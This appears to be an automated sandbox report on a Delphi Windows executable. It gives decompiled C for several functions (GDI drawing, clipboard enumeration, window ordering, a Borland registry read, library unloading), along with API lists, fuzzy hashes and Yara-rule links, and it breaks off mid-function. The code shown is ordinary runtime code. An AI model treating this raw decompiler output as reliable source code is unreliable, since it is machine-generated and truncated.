Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$InvalidateValidate$ClientPointsWindow
String ID:
API String ID: 2846033224-0
Opcode ID: c1419930f4ef1b886e20b1edb55900f5659d58c3b8b529466c9ad2514b523a82
Instruction ID: 8f7b6e4afddd45d0abec9c93a9cd33b7b645bb2b6bb9daf2783f45f17faafeb9
Opcode Fuzzy Hash: c1419930f4ef1b886e20b1edb55900f5659d58c3b8b529466c9ad2514b523a82
Instruction Fuzzy Hash: 20F09190A1830166DA00B6798CC7F4B229C5B0871CF001B7EB529FB1C3DD3CE8446B69

Uniqueness

Uniqueness Score: -1.00%

Function 004208D0, Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004208D0(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041FC20( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041FC20( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041FD00( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041EF40(E0041FBE4( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041EF40(E0041FBE4( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x004208d1
0x004208dc
0x004208ee
0x004208fd
0x00420937
0x00420948
0x004208ff
0x00420911
0x00420922
0x00420922

APIs

Part of subcall function 0041FC20: CreateBrushIndirect.GDI32(?), ref: 0041FCCA

UnrealizeObject.GDI32(00000000), ref: 004208DC
SelectObject.GDI32(?,00000000), ref: 004208EE
SetBkColor.GDI32(?,00000000), ref: 00420911
SetBkMode.GDI32(?,00000002), ref: 0042091C
SetBkColor.GDI32(?,00000000), ref: 00420937
SetBkMode.GDI32(?,00000001), ref: 00420942

Part of subcall function 0041EF40: GetSysColor.USER32(?), ref: 0041EF4A

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: a6638d6117bb529ea926627c6f0db795f0041ecf8f71370c7e66df592e636c83
Instruction ID: 55d553c2621eb92ca65e360b7563c21cbe5e5e16202b80e0da2f938bdbfb08af
Opcode Fuzzy Hash: a6638d6117bb529ea926627c6f0db795f0041ecf8f71370c7e66df592e636c83
Instruction Fuzzy Hash: A6F0CDB5604100ABDB04FFBADAC6E4B77A8AF0430970444AABD49DF197C93DE8518739

Uniqueness

Uniqueness Score: -1.00%

Function 00409F1C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409F1C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;

				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L2:
					_t40 =  *0x492714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409F10(_t73);
					L4:
					E00408C38( &_v273, 0x104, E0040ACC4(0x5c, _t89) + 1);
					_t74 = 0x40a09c;
					_t86 = 0x40a09c;
					_t83 =  *0x4077b0; // 0x4077fc
					if(E00403768(_t87, _t83) != 0) {
						_t74 = E004047F8( *((intOrPtr*)(_t87 + 4)));
						_t69 = E00408BD4(_t74, 0x40a09c);
						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
							_t86 = 0x40a0a0;
						}
					}
					_t51 =  *0x491268; // 0x407570
					_t16 = _t51 + 4; // 0xffe7
					_t53 =  *0x492714; // 0x400000
					LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
					E0040352C( *_t87,  &_v1116);
					_v860 =  &_v1116;
					_v856 = 4;
					_v852 =  &_v273;
					_v848 = 6;
					_v844 = _v12;
					_v840 = 5;
					_v836 = _t74;
					_v832 = 6;
					_v828 = _t86;
					_v824 = 6;
					E00409308(_v8,  &_v790, _a4, 4,  &_v860);
					return E00408BD4(_v8, _t86);
				}
				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
				_t89 = _t72;
				if(_t72 != 0) {
					_t75 = _t73 - _v820.AllocationBase;
					__eflags = _t75;
					_v12 = _t75;
					goto L4;
				}
				goto L2;
			}

0x00409f28
0x00409f2b
0x00409f2d
0x00409f39
0x00409f48
0x00409f66
0x00409f72
0x00409f78
0x00409f84
0x00409f92
0x00409fad
0x00409fb2
0x00409fb7
0x00409fbe
0x00409fcb
0x00409fd5
0x00409fd9
0x00409fe0
0x00409fe9
0x00409fe9
0x00409fe0
0x00409ffa
0x00409fff
0x0040a003
0x0040a00e
0x0040a01b
0x0040a026
0x0040a02c
0x0040a039
0x0040a03f
0x0040a049
0x0040a04f
0x0040a056
0x0040a05c
0x0040a063
0x0040a069
0x0040a085
0x0040a098
0x0040a098
0x00409f5d
0x00409f62
0x00409f64
0x00409f89
0x00409f89
0x00409f8f
0x00000000
0x00409f8f
0x00000000

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F39
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F5D
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F78
LoadStringA.USER32 ref: 0040A00E

Strings

pu@, xrefs: 00409FFA

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: pu@
API String ID: 3990497365-2401533281
Opcode ID: a5a38b676bc936d8dd8f9445abed1e69830851b5971d238807bc6027ad4bc452
Instruction ID: 250c0a161400bf9fd184712dd392f999e4706025d89d5f7226f90af7568db904
Opcode Fuzzy Hash: a5a38b676bc936d8dd8f9445abed1e69830851b5971d238807bc6027ad4bc452
Instruction Fuzzy Hash: 86411D70A002589BDB21DB69CD85BDAB7BC9B08304F0440FAA548F7292D7789F848F59

Uniqueness

Uniqueness Score: -1.00%

Function 00409F1A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409F1A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L3:
					_t40 =  *0x492714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409F10(_t74);
				} else {
					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
					_t101 = _t72;
					if(_t72 != 0) {
						_t77 = _t74 - _v820.AllocationBase;
						__eflags = _t77;
						_v12 = _t77;
					} else {
						goto L3;
					}
				}
				E00408C38( &_v273, 0x104, E0040ACC4(0x5c, _t101) + 1);
				_t75 = 0x40a09c;
				_t89 = 0x40a09c;
				_t85 =  *0x4077b0; // 0x4077fc
				if(E00403768(_t92, _t85) != 0) {
					_t75 = E004047F8( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00408BD4(_t75, 0x40a09c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a0a0;
					}
				}
				_t51 =  *0x491268; // 0x407570
				_t16 = _t51 + 4; // 0xffe7
				_t53 =  *0x492714; // 0x400000
				LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
				E0040352C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00409308(_v8,  &_v790, _a4, 4,  &_v860);
				return E00408BD4(_v8, _t89);
			}

0x00409f28
0x00409f2b
0x00409f2d
0x00409f39
0x00409f48
0x00409f66
0x00409f72
0x00409f78
0x00409f84
0x00409f4a
0x00409f5d
0x00409f62
0x00409f64
0x00409f89
0x00409f89
0x00409f8f
0x00000000
0x00000000
0x00000000
0x00409f64
0x00409fad
0x00409fb2
0x00409fb7
0x00409fbe
0x00409fcb
0x00409fd5
0x00409fd9
0x00409fe0
0x00409fe9
0x00409fe9
0x00409fe0
0x00409ffa
0x00409fff
0x0040a003
0x0040a00e
0x0040a01b
0x0040a026
0x0040a02c
0x0040a039
0x0040a03f
0x0040a049
0x0040a04f
0x0040a056
0x0040a05c
0x0040a063
0x0040a069
0x0040a085
0x0040a098

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F39
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F5D
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F78
LoadStringA.USER32 ref: 0040A00E

Strings

pu@, xrefs: 00409FFA

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: pu@
API String ID: 3990497365-2401533281
Opcode ID: 2fd7aeb24a657c887c83b712f53809e3310aaf4af242ca15c34684c4680f70f1
Instruction ID: b7b1d11f73f2457e4bc21a9f9f0e3170b821447ab0156cd7e66acd5e017d983c
Opcode Fuzzy Hash: 2fd7aeb24a657c887c83b712f53809e3310aaf4af242ca15c34684c4680f70f1
Instruction Fuzzy Hash: C9412D70A002589BDB21DB69CD85BDAB7FC9B08304F0440FAB548F7292D7789F848F59

Uniqueness

Uniqueness Score: -1.00%

Function 0042F4FC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042F4FC(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				void* __ecx;
				void* __ebp;
				void* _t16;
				void* _t20;
				void* _t24;
				void* _t25;
				signed short _t26;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t38;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t48;
				intOrPtr _t51;

				_t43 = __edx;
				_v8 = __eax;
				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
				_push(_t51);
				_push(0x42f59e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t51;
				_t26 = EnumClipboardFormats(0);
				_t52 = _t26;
				if(_t26 == 0) {
					L4:
					_t29 =  *0x490f50; // 0x41d728
					E0040A214(_t29, 1);
					E00403DA8();
					__eflags = 0;
					_pop(_t38);
					 *[fs:eax] = _t38;
					return  *((intOrPtr*)( *_v8 + 0x14))(0x42f5a5);
				} else {
					while(1) {
						_t16 = E004224A4(_t26, _t52);
						_t53 = _t16;
						if(_t16 != 0) {
							break;
						}
						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
						__eflags = _t26;
						if(__eflags != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					_t20 = GetClipboardData(_t26 & 0x0000ffff);
					E004223B4(_t43, _t20, _t26, _t53, GetClipboardData(9));
					_t24 = E00403E54();
					return _t24;
				}
				L6:
			}

0x0042f503
0x0042f505
0x0042f50d
0x0042f512
0x0042f513
0x0042f518
0x0042f51b
0x0042f525
0x0042f527
0x0042f52a
0x0042f571
0x0042f571
0x0042f57e
0x0042f583
0x0042f588
0x0042f58a
0x0042f58d
0x0042f59d
0x0042f52c
0x0042f52c
0x0042f533
0x0042f538
0x0042f53a
0x00000000
0x00000000
0x0042f56a
0x0042f56c
0x0042f56f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042f56f
0x0042f540
0x0042f555
0x0042f55a
0x0042f5aa
0x0042f5aa
0x00000000

APIs

EnumClipboardFormats.USER32(00000000,00000000,0042F59E), ref: 0042F520
GetClipboardData.USER32 ref: 0042F540
GetClipboardData.USER32 ref: 0042F549
EnumClipboardFormats.USER32(00000000,00000000,00000000,0042F59E), ref: 0042F565

Strings

4A, xrefs: 0042F52E

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$DataEnumFormats
String ID: 4A
API String ID: 1256399260-2184028395
Opcode ID: 12436c1aa4965cc38b4b179ff19ed5e3f7e1a3e194c48466feb82a99d1ed052d
Instruction ID: eae3a1543f8d4298aff6f539ec285c762ca43621e29743c359a572c9318fe245
Opcode Fuzzy Hash: 12436c1aa4965cc38b4b179ff19ed5e3f7e1a3e194c48466feb82a99d1ed052d
Instruction Fuzzy Hash: 4F112370700211BFD600FF66E952A2AB7E9EB85754B90007BF808DB382CD39DC44C668

Uniqueness

Uniqueness Score: -1.00%

Function 004545B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004545B0(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x492c04; // 0x2410d40
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E00454540, _t37);
						_t17 =  *(_t27 + 0x90);
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t17 =  *(_t27 + 0x90);
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t17 = SetWindowPos(E004141BC( *(_t27 + 0x90), _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}

0x004545b2
0x004545b5
0x004545b7
0x004545c0
0x004545cd
0x004545d6
0x004545d9
0x004545e5
0x004545ea
0x004545f4
0x00454602
0x00454604
0x00454611
0x00454613
0x00454613
0x0045461a
0x00454623
0x00454627
0x00454629
0x00454649
0x0045464e
0x0045464f
0x00454629
0x00454627
0x004545f4
0x00454654
0x00454654
0x0045465e

APIs

EnumWindows.USER32(00454540), ref: 004545E5
GetWindow.USER32(00000003,00000003), ref: 004545FD
GetWindowLongA.USER32 ref: 0045460A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00454649

Strings

dZG, xrefs: 004545B0

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnumLongWindows
String ID: dZG
API String ID: 4191631535-410245891
Opcode ID: 8e359ed334a69be4760922c82b058440bf929986694345fc13871243cf8b0c95
Instruction ID: c7c913ac3e620f8f4a439399e163372e1a93407348564ef15a95a51b3fb9fedf
Opcode Fuzzy Hash: 8e359ed334a69be4760922c82b058440bf929986694345fc13871243cf8b0c95
Instruction Fuzzy Hash: 83115170604210AFDB109F28CC85F9673D4AB56729F55017AFD68AF2D3C3789C85C759

Uniqueness

Uniqueness Score: -1.00%

Function 00403454, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00403454() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x47600c & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x47600c; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x47600c = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E004034C5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4034cc);
					return RegCloseKey(_v8);
				}
			}

0x00403455
0x00403457
0x00403461
0x0040347d
0x004034cc
0x004034de
0x004034e1
0x004034ea
0x0040347f
0x00403481
0x00403482
0x00403487
0x0040348a
0x0040348d
0x004034a9
0x004034b0
0x004034b3
0x004034b6
0x004034c4
0x004034c4

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403476
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034A9
RegCloseKey.ADVAPI32(?,004034CC,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034BF

Strings

FPUMaskValue, xrefs: 004034A0
SOFTWARE\Borland\Delphi\RTL, xrefs: 0040346C

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 3c11f0a672305b372e4dc847a6f18381d6739c74260647ea1639c62429796a73
Instruction ID: 3a8957fe435edeeffa09adf28aba9ffd9e61145ecfe252fb76a161489192219a
Opcode Fuzzy Hash: 3c11f0a672305b372e4dc847a6f18381d6739c74260647ea1639c62429796a73
Instruction Fuzzy Hash: 2201B575510308BAE711EF91CC42BA97BACD704B05F1045B6F908F65D0E6799A10CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00402924, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402924(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E004045B0(_t25, 0x105,  &_v532);
			}

0x0040292c
0x0040292e
0x00402932
0x0040293c
0x0040293f
0x00402944
0x00402956
0x0040295c
0x0040295c
0x0040296b
0x00402972
0x0040297c
0x0040297c
0x00402999

APIs

GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,004654E3), ref: 00402956
SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,004654E3), ref: 0040295C
GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,004654E3), ref: 0040296B
SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,004654E3), ref: 0040297C

Strings

:, xrefs: 0040293F

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 4b30bc702f1b8a1e79953e471d9f790ef3770be4b2b49636381e1e0539701b33
Instruction ID: 65af94f08173e3417ccc1a5c10f762e489d2bb018a98be52c56f19f3046a90dd
Opcode Fuzzy Hash: 4b30bc702f1b8a1e79953e471d9f790ef3770be4b2b49636381e1e0539701b33
Instruction Fuzzy Hash: 01F096622487805ED310E6788856BDB73DC9F55704F04846EBAC8E73C2F6B889449767

Uniqueness

Uniqueness Score: -1.00%

Function 004752D0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004752D0(void* __ecx) {
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t9;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr _t19;

				_push(_t19);
				_push(0x47533f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t19;
				 *0x492c8c =  *0x492c8c + 1;
				if( *0x492c8c == 0) {
					if( *0x492c90 != 0) {
						_t9 =  *0x492c90; // 0x0
						FreeLibrary(_t9);
					}
					if( *0x492c94 != 0) {
						_t7 =  *0x492c94; // 0x0
						FreeLibrary(_t7);
					}
					_t15 =  *0x467a48; // 0x467a4c
					E00404DF4(0x476cdc, _t15);
					_t16 =  *0x467a48; // 0x467a4c
					E00404DF4(0x476cd0, _t16);
				}
				_pop(_t14);
				 *[fs:eax] = _t14;
				_push(0x475346);
				return 0;
			}

0x004752d5
0x004752d6
0x004752db
0x004752de
0x004752e1
0x004752e7
0x004752f0
0x004752f2
0x004752f8
0x004752f8
0x00475304
0x00475306
0x0047530c
0x0047530c
0x00475316
0x0047531c
0x00475326
0x0047532c
0x0047532c
0x00475333
0x00475336
0x00475339
0x0047533e

APIs

FreeLibrary.KERNEL32(00000000,00000000,0047533F), ref: 004752F8
FreeLibrary.KERNEL32(00000000,00000000,0047533F), ref: 0047530C

Strings

LzF, xrefs: 00475316, 00475326
4zF, xrefs: 00475311
4zF, xrefs: 00475321

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: 4zF$4zF$LzF
API String ID: 3664257935-4285706521
Opcode ID: be020a1cb752e0502703d83cae74974f5055b196fc92fa32e8b583eb58854530
Instruction ID: cd44a410726c406b2b7fe0c4b6c757368d4010149d2f70e764c97d7e8f028b1c
Opcode Fuzzy Hash: be020a1cb752e0502703d83cae74974f5055b196fc92fa32e8b583eb58854530
Instruction Fuzzy Hash: 9BF0B470204A40AFD725AF69ED016AA3369E354304B41C43BE808476B0DBFD5801DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0045BDB0, Relevance: 7.8, APIs: 5, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0045BDB0(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				long _v12;
				char _v16;
				signed int _v17;
				struct tagRECT _v33;
				struct tagRECT _v49;
				struct tagRECT _v65;
				void* __edi;
				void* __ebp;
				intOrPtr _t138;
				intOrPtr _t148;
				signed int _t163;
				signed int _t166;
				intOrPtr _t167;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t183;
				signed int _t188;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr* _t240;
				signed int _t252;
				intOrPtr _t253;
				intOrPtr _t256;
				signed int _t257;
				void* _t265;

				_v12 = __ecx;
				_v8 = __eax;
				_t240 = _a24 + 0xfffffffc;
				_v16 = __edx;
				_v49.top = _a20;
				while(1) {
					_t138 = _v49.top;
					if(_t138 >= _a12) {
						break;
					}
					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
					if(_t138 > _v16) {
						_t257 = _v8;
						_v49.left = _v12;
						_v49.bottom = E0045F7B8( *_t240, _v16) + _v49.top;
						while(1) {
							__eflags = _v49.left - _a16;
							if(_v49.left >= _a16) {
								break;
							}
							_t148 =  *_t240;
							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
								_v49.right = E0045F798( *_t240, _t257) + _v49.left;
								__eflags = _v49.right - _v49.left;
								if(_v49.right <= _v49.left) {
									L39:
									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
									_t257 = _t257 + 1;
